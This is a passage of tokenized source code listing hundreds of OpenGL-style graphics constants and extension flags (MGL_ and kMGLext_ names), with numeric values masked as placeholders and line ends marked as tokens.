= <NUM_LIT> <EOL> MGL_TEXTURE15_ARB = <NUM_LIT> <EOL> MGL_LO_SCALE_NV = <NUM_LIT> <EOL> 
MGL_DOT_PRODUCT_REFLECT_CUBE_MAP_NV = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_LOCAL_PARAMETERS = <NUM_LIT> <EOL> MGL_SHADER_OBJECT_ARB = <NUM_LIT> <EOL> MGL_TEXTURE14_ARB = <NUM_LIT> <EOL> MGL_FLAT = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_INSTRUCTIONS_EXT = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_ADDRESS_REGISTERS = <NUM_LIT> <EOL> MGL_TEXTURE13_ARB = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_TEXTURE_CUBE_MAP_NV = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_ADDRESS_REGISTERS = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_TEXTURE12_ARB = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_TEXTURE_3D_NV = <NUM_LIT> <EOL> MGL_CONSTANT = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_ADDRESS_REGISTERS = <NUM_LIT> <EOL> MGL_TEXTURE11_ARB = <NUM_LIT> <EOL> MGL_CONSTANT_ATTENUATION = <NUM_LIT> <EOL> MGL_COMPRESSED_RGBA = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_TEXTURE_2D_NV = <NUM_LIT> <EOL> MGL_PROGRAM_ADDRESS_REGISTERS = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD24_EXT = <NUM_LIT> <EOL> MGL_TEXTURE10_ARB = <NUM_LIT> <EOL> MGL_POLYGON_MODE = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_DEPTH_REPLACE_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_B_TO_B_SIZE = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_ATTRIBS = <NUM_LIT> <EOL> MGL_TEXTURE9_ARB = <NUM_LIT> <EOL> MGL_ALPHA_TEST = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_NV = <NUM_LIT> <EOL> MGL_OP_RECIP_EXT = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_ATTRIBS = <NUM_LIT> <EOL> MGL_OBJECT_SHADER_SOURCE_LENGTH_ARB = <NUM_LIT> <EOL> MGL_TEXTURE8_ARB = <NUM_LIT> <EOL> MGL_SHADER_CONSISTENT_NV = <NUM_LIT> <EOL> MGL_ISOTROPIC_BRDF_NV = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_LOCALS_EXT = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_ATTRIBS = <NUM_LIT> <EOL> MGL_TEXTURE7_ARB = <NUM_LIT> <EOL> MGL_DEPENDENT_GB_TEXTURE_2D_NV = <NUM_LIT> <EOL> MGL_PROGRAM_ATTRIBS = <NUM_LIT> <EOL> MGL_TEXTURE_WRAP_R_EXT = <NUM_LIT> <EOL> MGL_TEXTURE6_ARB = <NUM_LIT> <EOL> MGL_DEPENDENT_AR_TEXTURE_2D_NV = <NUM_LIT> <EOL> MGL_SMOOTH = <NUM_LIT> <EOL> MGL_SAMPLE_COVERAGE_ARB = <NUM_LIT> <EOL> MGL_VARIANT_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_RGBA16 = 
<NUM_LIT> <EOL> MGL_TEXTURE5_ARB = <NUM_LIT> <EOL> MGL_RASTERIZER_DISCARD_EXT = <NUM_LIT> <EOL> MGL_OFFSET_TEXTURE_2D_NV = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_PARAMETERS = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD23_EXT = <NUM_LIT> <EOL> MGL_TEXTURE4_ARB = <NUM_LIT> <EOL> MGL_CULL_FRAGMENT_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_G_TO_G_SIZE = <NUM_LIT> <EOL> MGL_MAP2_TEXTURE_COORD_4 = <NUM_LIT> <EOL> MGL_RGB10_A2 = <NUM_LIT> <EOL> MGL_DOT3_RGB = <NUM_LIT> <EOL> kMGLext_WMGL_NV_allocate_memory = <NUM_LIT> <EOL> MGL_TEXTURE3_ARB = <NUM_LIT> <EOL> MGL_CLIENT_ATTRIB_STACK_DEPTH = <NUM_LIT> <EOL> MGL_PASS_THROUGH_NV = <NUM_LIT> <EOL> kMGLext_ARB_matrix_palette = <NUM_LIT> <EOL> MGL_RGBA8 = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB15_4_NV = <NUM_LIT> <EOL> MGL_NUM_INSTRUCTIONS_PER_PASS_ATI = <NUM_LIT> <EOL> MGL_BUFFER_SIZE_ARB = <NUM_LIT> <EOL> MGL_CONST_EYE_NV = <NUM_LIT> <EOL> MGL_LESS = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD16_EXT = <NUM_LIT> <EOL> MGL_RGB5_A1 = <NUM_LIT> <EOL> MGL_READ_WRITE_ARB = <NUM_LIT> <EOL> MGL_UNSIGNED_INT_S8_S8_8_8_NV = <NUM_LIT> <EOL> MGL_TEXTURE21 = <NUM_LIT> <EOL> MGL_PREVIOUS_TEXTURE_INPUT_NV = <NUM_LIT> <EOL> MGL_TEXTURE_DEPTH_SIZE_ARB = <NUM_LIT> <EOL> MGL_RGBA4 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_NORMALIZED = <NUM_LIT> <EOL> MGL_TEXTURE0_ARB = <NUM_LIT> <EOL> MGL_RENDERBUFFER_BINDING = <NUM_LIT> <EOL> MGL_LIGHTING = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_DIFFUSE_CUBE_MAP_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY1_NV = <NUM_LIT> <EOL> MGL_RGBA2 = <NUM_LIT> <EOL> MGL_PROGRAM_PARAMETERS = <NUM_LIT> <EOL> MGL_RGBA32F = <NUM_LIT> <EOL> kMGLext_ARB_vertex_buffer_object = <NUM_LIT> <EOL> MGL_MATRIX27 = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_EXT = <NUM_LIT> <EOL> MGL_FLOAT = <NUM_LIT> <EOL> MGL_FRONT_FACE = <NUM_LIT> <EOL> MGL_RGB16 = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD22_EXT = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_OFFSET_TEXTURE_2D_MATRIX_NV = <NUM_LIT> <EOL> MGL_COMBINER_MAPPING_NV = <NUM_LIT> <EOL> 
MGL_RGB12 = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_SIGNED_RGB_UNSIGNED_ALPHA_NV = <NUM_LIT> <EOL> MGL_COLOR_TABLE_LUMINANCE_SIZE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_BIT = <NUM_LIT> <EOL> MGL_CULL_MODES_NV = <NUM_LIT> <EOL> MGL_RGB10 = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_MAX_ANISOTROPY_EXT = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_EDGE_FLAG = <NUM_LIT> <EOL> MGL_RGB8 = <NUM_LIT> <EOL> MGL_STATIC_COPY_ARB = <NUM_LIT> <EOL> kMGLext_ATI_meminfo = <NUM_LIT> <EOL> MGL_POLYGON_STIPPLE = <NUM_LIT> <EOL> MGL_REG_5_ATI = <NUM_LIT> <EOL> MGL_RGB5 = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_STATIC_READ_ARB = <NUM_LIT> <EOL> MGL_NUM_COMPRESSED_TEXTURE_FORMATS = <NUM_LIT> <EOL> MGL_POLYGON_SMOOTH = <NUM_LIT> <EOL> MGL_SELECT = <NUM_LIT> <EOL> MGL_RGB4 = <NUM_LIT> <EOL> MGL_STATIC_DRAW_ARB = <NUM_LIT> <EOL> MGL_SPOT_DIRECTION = <NUM_LIT> <EOL> MGL_DSDT_MAG_INTENSITY_NV = <NUM_LIT> <EOL> MGL_R3_G3_B2 = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD21_EXT = <NUM_LIT> <EOL> MGL_MODELVIEW = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_EXT = <NUM_LIT> <EOL> kMGLext_SGIX_shadow = <NUM_LIT> <EOL> MGL_LIST_INDEX = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_A_SIZE = <NUM_LIT> <EOL> MGL_PACK_SKIP_ROWS = <NUM_LIT> <EOL> MGL_FENCE_CONDITION_NV = <NUM_LIT> <EOL> MGL_INTENSITY16 = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_CND_ATI = <NUM_LIT> <EOL> MGL_LIST_BASE = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_INTENSITY12 = <NUM_LIT> <EOL> MGL_SHININESS = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_MAX_LIST_NESTING = <NUM_LIT> <EOL> MGL_ENABLE_BIT = <NUM_LIT> <EOL> MGL_INTENSITY8 = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_LIST_MODE = <NUM_LIT> <EOL> MGL_INTENSITY4 = <NUM_LIT> <EOL> MGL_VARIABLE_C_NV = <NUM_LIT> <EOL> MGL_LUMINANCE_ALPHA16F = <NUM_LIT> <EOL> kMGLext_EXT_fog_coord = <NUM_LIT> <EOL> 
MGL_CURRENT_FOG_COORDINATE_EXT = <NUM_LIT> <EOL> MGL_LINE_STIPPLE_REPEAT = <NUM_LIT> <EOL> MGL_RGB_SCALE = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD25_EXT = <NUM_LIT> <EOL> MGL_FLOAT_RG32_NV = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_TRANSPOSE_TEXTURE_MATRIX_ARB = <NUM_LIT> <EOL> MGL_LINE_STIPPLE_PATTERN = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD13_EXT = <NUM_LIT> <EOL> MGL_LUMINANCE16_ALPHA16 = <NUM_LIT> <EOL> MGL_CLIP_PLANE0 = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_EXT = <NUM_LIT> <EOL> MGL_DOT_PRODUCT_CONST_EYE_REFLECT_CUBE_MAP_NV = <NUM_LIT> <EOL> MGL_LINE_STIPPLE = <NUM_LIT> <EOL> MGL_BIAS_BY_NEGATIVE_ONE_HALF_NV = <NUM_LIT> <EOL> MGL_COLOR_TABLE_BLUE_SIZE_EXT = <NUM_LIT> <EOL> MGL_LUMINANCE12_ALPHA12 = <NUM_LIT> <EOL> MGL_SOURCE1_ALPHA_EXT = <NUM_LIT> <EOL> MGL_FOG_COORDINATE_SOURCE_EXT = <NUM_LIT> <EOL> MGL_MAX = <NUM_LIT> <EOL> MGL_TEXTURE7 = <NUM_LIT> <EOL> MGL_LINE_WIDTH_GRANULARITY = <NUM_LIT> <EOL> MGL_LUMINANCE12_ALPHA4 = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB12_4_NV = <NUM_LIT> <EOL> kMGLext_texture_border_clamp = <NUM_LIT:15> <EOL> MGL_COMPRESSED_RGBA_S3TC_DXT5_EXT = <NUM_LIT> <EOL> MGL_LINE_WIDTH_RANGE = <NUM_LIT> <EOL> MGL_LUMINANCE8_ALPHA8 = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_LINE_WIDTH = <NUM_LIT> <EOL> MGL_FLOAT_RGB_NV = <NUM_LIT> <EOL> MGL_VARIABLE_B_NV = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_LINE_SMOOTH = <NUM_LIT> <EOL> MGL_OBJECT_ACTIVE_ATTRIBUTE_MAX_LENGTH_ARB = <NUM_LIT> <EOL> MGL_FLOAT_RG_NV = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_TRANSPOSE_PROJECTION_MATRIX_ARB = <NUM_LIT> <EOL> MGL_POINT_SIZE_GRANULARITY = <NUM_LIT> <EOL> MGL_FLOAT_R_NV = <NUM_LIT> <EOL> MGL_COLOR_TABLE_WIDTH_EXT = <NUM_LIT> <EOL> MGL_FOG_BIT = <NUM_LIT> <EOL> MGL_POINT_SIZE_RANGE = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_G_SIZE = <NUM_LIT> <EOL> MGL_COLOR_CLEAR_UNCLAMPED_VALUE_ATI = <NUM_LIT> <EOL> 
MGL_ELEMENT_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_MODELVIEW_MATRIX = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_COORDS_ARB = <NUM_LIT> <EOL> MGL_PREVIOUS = <NUM_LIT> <EOL> MGL_RGBA_FLOAT_MODE_ATI = <NUM_LIT> <EOL> MGL_SET = <NUM_LIT> <EOL> MGL_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_TEX_INDIRECTIONS_ARB = <NUM_LIT> <EOL> MGL_MIRROR_CLAMP_TO_EDGE_ATI = <NUM_LIT> <EOL> kMGLext_NV_vertex_array_range = <NUM_LIT> <EOL> MGL_ELEMENT_ARRAY_BUFFER_ARB = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_DISTANCE = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_Y_ARB = <NUM_LIT> <EOL> MGL_ALPHA16 = <NUM_LIT> <EOL> MGL_VARIABLE_A_NV = <NUM_LIT> <EOL> MGL_ARRAY_BUFFER_ARB = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_POSITION_VALID = <NUM_LIT> <EOL> MGL_OBJECT_ACTIVE_ATTRIBUTES_ARB = <NUM_LIT> <EOL> MGL_VARIANT_ARRAY_EXT = <NUM_LIT> <EOL> MGL_ALPHA12 = <NUM_LIT> <EOL> MGL_MATRIX31 = <NUM_LIT> <EOL> MGL_TRANSPOSE_MODELVIEW_MATRIX_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_Z = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_POSITION = <NUM_LIT> <EOL> MGL_ALPHA8 = <NUM_LIT> <EOL> MGL_CLIP_PLANE2 = <NUM_LIT> <EOL> MGL_MATRIX30 = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_TEX_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_SCALE_BY_FOUR_NV = <NUM_LIT> <EOL> MGL_ALPHA4 = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_X_ARB = <NUM_LIT> <EOL> kMGLext_color_table = <NUM_LIT> <EOL> MGL_MATRIX29 = <NUM_LIT> <EOL> MGL_MIN = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_INDEX = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_FILL = <NUM_LIT> <EOL> MGL_REG_3_ATI = <NUM_LIT> <EOL> MGL_MATRIX28 = <NUM_LIT> <EOL> MGL_SUBTRACT = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_COLOR = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_LINE = <NUM_LIT> <EOL> MGL_N3F_V3F = <NUM_LIT> <EOL> MGL_CURRENT_TEXTURE_COORDS = <NUM_LIT> <EOL> MGL_TEXTURE_BORDER_VALUES_NV = <NUM_LIT> <EOL> MGL_REGISTER_COMBINERS_NV = <NUM_LIT> <EOL> MGL_C4F_N3F_V3F = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_ALU_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_MAX_COMBINED_TEXTURE_IMAGE_UNITS_ARB = <NUM_LIT> <EOL> 
MGL_TEXTURE_MAX_ANISOTROPY_EXT = <NUM_LIT> <EOL> MGL_VIBRANCE_BIAS_NV = <NUM_LIT> <EOL> kMGLext_ARB_occlusion_query = <NUM_LIT> <EOL> MGL_MATRIX25 = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_SEPARATE_COMPONENTS_EXT = <NUM_LIT> <EOL> MGL_CURRENT_INDEX = <NUM_LIT> <EOL> MGL_MAGNITUDE_BIAS_NV = <NUM_LIT> <EOL> MGL_T4F_C4F_N3F_V4F = <NUM_LIT> <EOL> MGL_C3F_V3F = <NUM_LIT> <EOL> MGL_CURRENT_COLOR = <NUM_LIT> <EOL> MGL_SCALE_BY_TWO_NV = <NUM_LIT> <EOL> MGL_DT_BIAS_NV = <NUM_LIT> <EOL> MGL_C4UB_V3F = <NUM_LIT> <EOL> MGL_SIGNED_INTENSITY_NV = <NUM_LIT> <EOL> MGL_DOMAIN = <NUM_LIT> <EOL> MGL_DS_BIAS_NV = <NUM_LIT> <EOL> MGL_OR_INVERTED = <NUM_LIT> <EOL> MGL_C4UB_V2F = <NUM_LIT> <EOL> MGL_FRAGMENT_PROGRAM_ARB = <NUM_LIT> <EOL> MGL_LO_BIAS_NV = <NUM_LIT> <EOL> MGL_MATRIX21 = <NUM_LIT> <EOL> MGL_COEFF = <NUM_LIT> <EOL> MGL_REG_4_ATI = <NUM_LIT> <EOL> MGL_HI_BIAS_NV = <NUM_LIT> <EOL> MGL_TEXTURE_3D = <NUM_LIT> <EOL> MGL_MATRIX20 = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSED = <NUM_LIT> <EOL> MGL_CCW = <NUM_LIT> <EOL> MGL_VIBRANCE_SCALE_NV = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_MODE_EXT = <NUM_LIT> <EOL> MGL_CW = <NUM_LIT> <EOL> MGL_MAGNITUDE_SCALE_NV = <NUM_LIT> <EOL> MGL_T2F_C4F_N3F_V3F = <NUM_LIT> <EOL> MGL_MATRIX18 = <NUM_LIT> <EOL> MGL_EXP2 = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_I_SIZE = <NUM_LIT> <EOL> MGL_DT_SCALE_NV = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_FUNC_ADD = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_COORDS_NV = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_DS_SCALE_NV = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB8_4_NV = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_FRAGMENT_PROGRAM_NV = <NUM_LIT> <EOL> MGL_ALPHA_TEST_FUNC = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_INTERLEAVED_COMPONENTS_EXT = <NUM_LIT> <EOL> MGL_HI_SCALE_NV = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_POINTER_NV = <NUM_LIT> 
<EOL> kMGLext_EXT_secondary_color = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_FENCE_STATUS_NV = <NUM_LIT> <EOL> MGL_SIGNED_RGB8_UNSIGNED_ALPHA8_NV = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_VARYING_MAX_LENGTH_EXT = <NUM_LIT> <EOL> MGL_ALL_COMPLETED_NV = <NUM_LIT> <EOL> MGL_ATTRIB_STACK_DEPTH = <NUM_LIT> <EOL> MGL_T2F_N3F_V3F = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_PRIMITIVES_GENERATED_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_RED_SIZE = <NUM_LIT> <EOL> MGL_DSDT8_MAG8_INTENSITY8_NV = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_MUL_ATI = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_SIZE_EXT = <NUM_LIT> <EOL> MGL_PROJECTION_MATRIX = <NUM_LIT> <EOL> MGL_OR_REVERSE = <NUM_LIT> <EOL> kMGLext_texture_env_dot3 = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_SIZE = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_START_EXT = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_INSTRUCTIONS_EXT = <NUM_LIT> <EOL> MGL_DSDT8_NV = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_OP_LOG_BASE_2_EXT = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_VARYINGS_EXT = <NUM_LIT> <EOL> MGL_SIGNED_INTENSITY8_NV = <NUM_LIT> <EOL> MGL_MAX_VERTEX_ARRAY_RANGE_ELEMENT_NV = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_UNITS_ARB = <NUM_LIT> <EOL> MGL_PROJECTION_STACK_DEPTH = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_BINDING_NV = <NUM_LIT> <EOL> MGL_CLIENT_ACTIVE_TEXTURE_ARB = <NUM_LIT> <EOL> MGL_MODELVIEW_STACK_DEPTH = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD14_EXT = <NUM_LIT> <EOL> MGL_OP_POWER_EXT = <NUM_LIT> <EOL> MGL_ACTIVE_TEXTURE_ARB = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_PARAMETERS = <NUM_LIT> <EOL> MGL_VIEWPORT = <NUM_LIT> <EOL> MGL_AND_REVERSE = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_SIZE = <NUM_LIT> <EOL> MGL_BLEND_COLOR = <NUM_LIT> <EOL> MGL_TEXTURE31_ARB = <NUM_LIT> <EOL> MGL_NORMALIZE = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB6_4_NV 
= <NUM_LIT> <EOL> MGL_OP_EXP_BASE_2_EXT = <NUM_LIT> <EOL> MGL_TEXTURE30_ARB = <NUM_LIT> <EOL> MGL_LOCAL_EXT = <NUM_LIT> <EOL> MGL_MATRIX_MODE = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_NV = <NUM_LIT> <EOL> kMGLext_NV_texture_shader = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_SEPARATE_ATTRIBS_NV = <NUM_LIT> <EOL> MGL_STENCIL_WRITEMASK = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_VALID_NV = <NUM_LIT> <EOL> MGL_OP_FLOOR_EXT = <NUM_LIT> <EOL> MGL_INTERLEAVED_ATTRIBS_NV = <NUM_LIT> <EOL> MGL_STENCIL_REF = <NUM_LIT> <EOL> MGL_OP_CLAMP_EXT = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_NV = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_SEPARATE_ATTRIBS_NV = <NUM_LIT> <EOL> MGL_STENCIL_PASS_DEPTH_PASS = <NUM_LIT> <EOL> MGL_T2F_C4UB_V3F = <NUM_LIT> <EOL> MGL_TEXTURE_WRAP_T = <NUM_LIT> <EOL> MGL_OP_SET_LT_EXT = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_INTERLEAVED_COMPONENTS_NV = <NUM_LIT> <EOL> MGL_RGBA12 = <NUM_LIT> <EOL> MGL_STENCIL_PASS_DEPTH_FAIL = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_X_ARB = <NUM_LIT> <EOL> kMGLext_color_matrix = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY = <NUM_LIT> <EOL> MGL_MOV_ATI = <NUM_LIT> <EOL> MGL_RASTERIZER_DISCARD_NV = <NUM_LIT> <EOL> MGL_STENCIL_FAIL = <NUM_LIT> <EOL> MGL_EQUIV = <NUM_LIT> <EOL> MGL_NUM_FRAGMENT_CONSTANTS_ATI = <NUM_LIT> <EOL> MGL_OP_MIN_EXT = <NUM_LIT> <EOL> MGL_TEXTURE24_ARB = <NUM_LIT> <EOL> MGL_EVAL_BIT = <NUM_LIT> <EOL> MGL_INVARIANT_EXT = <NUM_LIT> <EOL> MGL_STENCIL_VALUE_MASK = <NUM_LIT> <EOL> MGL_INDEX_ARRAY = <NUM_LIT> <EOL> MGL_OP_ROUND_EXT = <NUM_LIT> <EOL> MGL_PRIMITIVES_GENERATED_NV = <NUM_LIT> <EOL> MGL_STENCIL_FUNC = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_LENGTH_NV = <NUM_LIT> <EOL> MGL_RENDER = <NUM_LIT> <EOL> MGL_COLOR_SUM_CLAMP_NV = <NUM_LIT> <EOL> MGL_COLOR_ARRAY = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_RECORD_NV = <NUM_LIT> <EOL> MGL_STENCIL_CLEAR_VALUE = <NUM_LIT> <EOL> kMGLext_ARB_fragment_program = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY = <NUM_LIT> 
<EOL> MGL_TEXTURE29_ARB = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_SIZE_NV = <NUM_LIT> <EOL> MGL_STENCIL_TEST = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD12_EXT = <NUM_LIT> <EOL> MGL_CON_8_ATI = <NUM_LIT> <EOL> MGL_OP_ADD_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_ALPHA_SIZE = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_START_NV = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_PARAMETERS = <NUM_LIT> <EOL> MGL_ACCUM_CLEAR_VALUE = <NUM_LIT> <EOL> MGL_OP_MUL_EXT = <NUM_LIT> <EOL> MGL_CON_31_ATI = <NUM_LIT> <EOL> MGL_DEPTH_ATTACHMENT = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_VARYINGS_NV = <NUM_LIT> <EOL> MGL_DEPTH_FUNC = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB4_4_NV = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_buffer_region = <NUM_LIT> <EOL> MGL_OP_DOT4_EXT = <NUM_LIT> <EOL> MGL_ACTIVE_VARYING_MAX_LENGTH_NV = <NUM_LIT> <EOL> MGL_LIST_BIT = <NUM_LIT> <EOL> MGL_DEPTH_CLEAR_VALUE = <NUM_LIT> <EOL> MGL_4X_BIT_ATI = <NUM_LIT:2> <EOL> MGL_OP_DOT3_EXT = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_ACTIVE_VARYINGS_NV = <NUM_LIT> <EOL> MGL_DEPTH_WRITEMASK = <NUM_LIT> <EOL> MGL_SWIZZLE_STRQ_ATI = <NUM_LIT> <EOL> MGL_OP_NEGATE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSED_IMAGE_SIZE = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_SEPARATE_COMPONENTS_NV = <NUM_LIT> <EOL> MGL_DEPTH_TEST = <NUM_LIT> <EOL> MGL_OP_INDEX_EXT = <NUM_LIT> <EOL> MGL_TEXTURE28_ARB = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_MODE_NV = <NUM_LIT> <EOL> MGL_DEPTH_RANGE = <NUM_LIT> <EOL> MGL_T2F_V3F = <NUM_LIT> <EOL> MGL_AMBIENT_AND_DIFFUSE = <NUM_LIT> <EOL> MGL_TEXTURE_1D_BINDING = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_ATTRIBS_NV = <NUM_LIT> <EOL> MGL_FOG_COLOR = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_2D = <NUM_LIT> <EOL> MGL_CONSTANT_ALPHA_EXT = <NUM_LIT> <EOL> MGL_GENERIC_ATTRIB_NV = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_FOG_MODE = <NUM_LIT> <EOL> 